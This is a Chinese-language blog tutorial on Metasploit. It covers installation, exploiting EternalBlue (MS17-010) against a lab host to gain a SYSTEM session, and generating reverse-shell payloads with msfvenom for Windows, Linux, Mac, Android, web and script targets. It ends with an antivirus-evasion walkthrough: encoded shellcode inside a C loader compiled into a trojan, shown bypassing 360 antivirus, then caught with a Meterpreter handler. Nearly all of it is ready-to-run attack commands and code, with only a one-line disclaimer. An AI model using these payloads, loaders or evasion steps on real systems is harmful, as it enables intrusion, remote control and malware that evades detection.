MSF的使用教程

公眾號：白帽子左一 

本文僅用于技術討論，禁止用于違法途徑

MSF簡介

Metasploit（MSF）是一個免費的、可下載的框架，通過它可以很容易地獲取、開發并對計算機軟體漏洞實施攻擊，它本身附帶數百個已知軟體漏洞，是一款專業級漏洞攻擊工具，

當H.D. Moore在2003年發布Metasploit時，計算機安全狀況也被永久性地改變了，仿佛一夜之間，任何人都可以成為黑客，因為只要掌握MSF的使用方法，每個人都可以使用MSF來攻擊那些未打過補丁或者剛剛打過補丁的漏洞，也因此軟體廠商再也不能推遲發布針對已公布漏洞的補丁了，因為Metasploit團隊一直都在努力開發各種攻擊工具，并將它們貢獻給所有Metasploit用戶，

MSF安裝介紹

MSF官網：https://www.metasploit.com/

MSF有兩個版本，Metaploit是開源免費的，Metaploit pro的商業收費的，這里我們用免費的社區版就可以了

MSF下載地址：https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

MSF安裝

（1）一鍵式安裝

在Linux / macOS上安裝Metasploit，這里有官方提供的腳本，可以一鍵式安裝

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall

（2）手動安裝

注意：如果上面方法不可行，也可以進行手動安裝

Debian / Ubuntu軟體包位于https://apt.metasploit.com，而CentOS / Redhat / Fedora軟體包位于https://rpm.metasploit.com

ubuntu安裝
從https://apt.metasploit.com/下載MSF 的deb安裝包，
在終端運行：dpkg -i metasploit-framework_6.0.7+20200916102431_1rapid7-1_amd64.deb
就已經安裝好了，資料庫的安裝看上面的步驟

Centos安裝
從https://rpm.metasploit.com下載 rpm安裝包
在終端運行：rpm-i metasploit-framework-6.0.7+20200916102441~1rapid7-1.el6.x86_64.rpm

安裝完成

安裝postgresql資料庫

msf使用的是postgresql資料庫,如果沒有的話需要先安裝

安裝資料庫的時候會自動創建系統用戶postgres,資料庫用戶postgres,資料庫postgres

1、apt-get install postgresql //安裝postgresql資料庫

2、su - postgres //切換到postgres用戶

3、psql //登陸postgresql資料庫，首次登陸沒有密碼

4、\password postgres //修改資料庫用戶postgres的密碼

msf更新命令：

sudo msfupdate

msf使用資料庫

1、msfconsole //啟動msf

2、db_connect postgres:hehehe@127.0.0.1/test //用戶名，密碼，地址，自己隨意編造的名字，

3、db_status //查看資料庫連接狀態

MSF的功能模塊介紹

MSF所用功能主要可分為這幾個模塊，每個模塊都有各自的功能領域，形成了滲透測驗的流程

1、Auxiliary（輔助模塊）
為滲透測驗資訊搜集提供了大量的輔助模塊支持
2、Exploits（攻擊模塊）
利用發現的安全漏洞或配置弱點對遠程目標系統 進行攻擊，從而獲得對遠程目標系統訪問權的代碼組件，
3、Payload（攻擊載荷模塊）
攻擊成功后促使靶機運行的一段植入代碼
4、Post （后滲透攻擊模塊）
收集更多資訊或進一步訪問被利用的目標系統
5、Encoders（編碼模塊）
將攻擊載荷進行編碼，來繞過防護軟體攔截

MSF的基本使用方法

例如攻擊永恒之藍：

開啟資料庫：service postgresql start

初始化msf資料庫:msfdb init

開啟MSF:msfconsole

這里我們拿永恒之藍這個漏洞進行簡單的使用

首先要保證是能夠訪問到目標機器的，那么我們先ping一下目標機器，看網路是否連通

此時是連通的狀態

永恒之藍的漏洞編號：ms17-010

根據漏洞名稱搜索 : search ms17_010

1、運用輔助模塊掃描目標

設定模塊：use auxiliary/scanner/smb/smb_ms17_010

查看設定：options

設定目標地址：set rhosts 192.168.174.129

目標埠默認是445，如果用nmap埠掃描windows檔案共享服務不是開放在445埠上面，那這里需要進行修改，set rport 目標埠

設定好了之后，run或者exploit 進行攻擊

綠色的加號為可攻擊

2、設定攻擊模塊對目標進行攻擊

使用攻擊模塊：use exploit/windows/smb/ms17_010_eternalblue

查看所需設定：options

設定目標地址：set RHOSTS 192.168.174.129

設定目標埠：set RPORT 445

設定payload：set payload windows/x64/meterpreter/reverse_tcp

設定本地地址：set LHOST 192.168.174.192

攻擊：run或者exploit

攻擊成功，成功拿到會話

注意：存在一定機率將目標機器打成藍屏或者重啟

查看目前權限

系統權限，想干什么都可以了~

MSF后門生成模塊

Msfvenom常用命令引數

1. -l, --list <type>
2. # 列出所有可用的專案，其中值可以被設定為 payloads, encoders, nops, platforms, archs, encrypt, formats等等
4. -p, --payload <payload>
5. # 指定特定的 Payload，如果被設定為 - ，那么從標準輸入流中讀取
7. --list-options
8. # 列出--payload <value> 的標準，高級和規避選項
10. -f, --format <format>
11. # 指定 Payload 的輸出格式(使用 --list formats 列出)
13. -e, --encoder <encoder>
14. # 指定使用的 Encoder (使用 --list encoders 列出)
16. --sec-name <value>
17. # 生成大型Windows二進制檔案時使用的新名稱，默認值：隨機4個字符的字串
19. --smallest
20. # 使用所有可用的編碼器生成最小的payload
22. --encrypt <value>
23. # 應用于shellcode的加密或編碼型別 (使用--list encrypt 列出)
25. --encrypt-key <value>
26. # 用于加密的密鑰
28. --encrypt-iv <value>
29. # 加密的初始化向量
31. -a, --arch <arch>
32. # 指定目標系統架構(使用 --list archs 列出)
34. --platform <platform>
35. # 指定目標系統平臺 (使用 --list platforms 列出)
37. -o, --out <path>
38. # 保存payload檔案
40. -b, --bad-chars <list>
41. # 設定需要在 Payload 中避免出現的字符，如： '\x00\xff'
43. -n, --nopsled <length>
44. # 指定 nop 在 payload 中的數量
46. -s, --space <length>
47. # 設定未經編碼的 Payload 的最大長度
49. --encoder-space <length>
50. # 編碼后的 Payload 的最大長度
52. -i, --iterations <count>
53. # 設定 Payload 的編碼次數
55. -c, --add-code <path>
56. # 指定包含一個額外的win32 shellcode檔案
58. -x, --template <path>
59. # 指定一個特定的可執行檔案作為模板
61. -k, --keep
62. # 保護模板程式的功能，注入的payload作為一個新的行程運行
64. -v, --var-name <value>
65. # 指定一個變數名（當添加 -f 引數的時候，例如 -f python，那么輸出為 python 代碼， payload 會被按行格式化為 python 代碼，追加到一個 python 變數中，這個引數即為指定 python 變數的變數名）
67. -t, --timeout <second>
68. # 設定從STDIN讀取payload的等待時間（默認為30,0為禁用）
70. -h, --help
71. # 幫助

msfvenom生成shellcode

普通生成

1. msfvenom -p 有效載荷 -f 輸出格式 -o 輸出檔案
2. msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

編碼生成

1. msfvenom -a 系統架構 --platform 系統平臺 -p 有效載荷 lhost=攻擊機IP lport=攻擊機埠 -e 編碼方式 -i編碼次數 -f 輸出格式 -o 輸出檔案
2. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

msfvenom —list archs #查看支持的系統架構

1. aarch64, armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mips64, mips64le, mipsbe, mipsle, nodejs, php, ppc, ppc64, ppc64le, ppce500v2, python, r, ruby, sparc, sparc64, tty, x64, x86, x86_64, zarch

msfvenom —list platforms #查看支持系統平臺

1. aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, juniper, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unifi, unix, unknown, windows

msfvenom -l payload #列出所有可用的payload

msfvenom -l formats #列出所有的輸出格式

msfvenom -l encrypt #列出所有的加密方式

msfvenom -l encoders #列出所有的編碼器

常見生成格式

1、 Windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

2、Linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

3、Mac

msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

4、Android

msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

5、Aspx

msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

6、JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

7、PHP

msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

8、BASH

msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

9、Python

msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py

木馬如何免殺

木馬繞過免殺本質上還是更改他的特征碼，那么總結一下可以有

1. 編碼
2. 加殼免殺
3. 二次編譯
4. 分離免殺：即將ShellCode和加載器分離

目前msfvenom的encoder特征基本都進入了殺軟的漏洞庫，很難實作單一encoder編碼而繞過殺軟，所以對shellcode進行進一步修改編譯成了msf免殺的主流，互聯網上有很多借助于C、C#、python等語言對shellcode進行二次編碼從而達到免殺的效果，

第一步：安裝編譯軟體VC++6.0

第二步：生成一個常見的木馬

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.174.196 lport=1250 -f c

第三步、編譯c語言為exe檔案

1. #include "stdafx.h"
2. #include <stdio.h>
3. #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
4. unsigned char buf[] =
5. （這里放生成好的陣列）
6. main()
7. {
8. ((void(*)(void))&buf)();
9. }

打開vc6.0，新建一個程式

選擇一個簡單的win32程式

打開a.app

將我們的代碼復制進去

編譯一下，看是否有問題

再編譯一下a.cpp

沒有問題的話，就可以組建a.exe了，這個檔案就是我們要的木馬檔案

第四步、測驗是否成功

把得到的a.exe 復制到桌面，右鍵用360的木馬云查殺功能試一下

成功繞過~

再測驗一下我們的木馬是否有用，打開MSF開啟監聽

1. 開啟監聽：msf5 > use exploit/multi/handler
2. 設定payload，和生成的木馬保持一致：set payload windows/meterpreter/reverse_tcp
3. 設定本地地址，和木馬一致：set lhost 192.168.174.196
4. 設定本地埠，和木馬一致：set lport 1250

1. msf5 exploit(multi/handler) > run

成功拿到會話了， 證明我們的木馬沒啥問題~

標籤：其他

上一篇：入門clash 及 proxy 坑點

下一篇：淺析HTTPS的通信機制